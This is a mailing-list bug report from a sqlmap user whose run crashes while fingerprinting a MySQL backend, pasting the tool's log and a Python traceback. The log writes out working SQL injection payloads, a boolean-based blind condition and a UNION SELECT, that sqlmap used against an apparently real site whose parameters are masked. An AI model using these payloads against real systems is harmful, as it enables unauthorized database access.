[sqlmap-users] Unable to fingerprint dbms
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] Unable to fingerprint dbms
|
From: -insane- <in...@gm...> - 2011-01-12 16:57:22
|
Unable to fingerprint any dbms. If i use earlier versions it works.
sqlmap identified the following injection points with a total of 0
HTTP(s) requests:
---
Place: GET
Parameter: xxx
Type: boolean-based blind
Title: AND boolean-based blind - WHERE clause
Payload: id=995&xxx=1&xxx=xxx.php&xxx=283935 AND
8933=8933&xxx=aGVsbHNpY2h0aWdlcyBLYXJ0ZW5sZWdlbiBvaG5lIFZvcmFiaW5mb3JtYXRpb24
Type: UNION query
Title: MySQL NULL UNION query - 1 to 3 columns
Payload: id=995&xxx=1&xxx=xxx.php&xxx=283935 UNION ALL SELECT NULL,
NULL, NULL, CHAR(75,101,105,110), NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL#&xxx=aGVsbHNpY2h0aWdlcyBLYXJ0ZW5sZWdlbiBvaG5lIFZvcmFiaW5mb3JtYXRpb24
---
[17:51:28] [INFO] testing MySQL
[17:51:28] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your
run with the latest development version from the Subversion repository.
If the exception persists, please send by e-mail to
sql...@li... the command line, the following text
and any information needed to reproduce the bug. The developers will try
to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 0.9-dev (r2946)
Python version: 2.5.2
Operating system: posix
Traceback (most recent call last):
File "/pentest/database/sqlmap/sqlmap.py", line 83, in main
start()
File "/pentest/database/sqlmap/lib/controller/controller.py", line
407, in start
action()
File "/pentest/database/sqlmap/lib/controller/action.py", line 31, in
action
setHandler()
File "/pentest/database/sqlmap/lib/controller/handler.py", line 103,
in setHandler
if handler.checkDbms():
File "/pentest/database/sqlmap/plugins/dbms/mysql/fingerprint.py",
line 175, in checkDbms
result =
inject.checkBooleanExpression("CONNECTION_ID()=CONNECTION_ID()")
File "/pentest/database/sqlmap/lib/request/inject.py", line 504, in
checkBooleanExpression
return getValue(unescaper.unescape(expression),
expected=EXPECTED.BOOL, suppressOutput=True, expectingNone=expectingNone)
File "/pentest/database/sqlmap/lib/request/inject.py", line 421, in
getValue
value = __goInband(forgeCaseExpression, expected, sort, resumeValue,
unpack, dump)
File "/pentest/database/sqlmap/lib/request/inject.py", line 379, in
__goInband
output = unionUse(expression, resetCounter=True, unpack=unpack,
dump=dump)
File "/pentest/database/sqlmap/lib/techniques/inband/union/use.py",
line 214, in unionUse
query = agent.forgeInbandQuery(expression, exprPosition=vector[0],
count=vector[1], comment=vector[2], prefix=vector[3], suffix=vector[4])
File "/pentest/database/sqlmap/lib/core/agent.py", line 542, in
forgeInbandQuery
inbandQuery += conf.uChar
TypeError: cannot concatenate 'str' and 'NoneType' objects
[*] shutting down at: 17:51:28
|
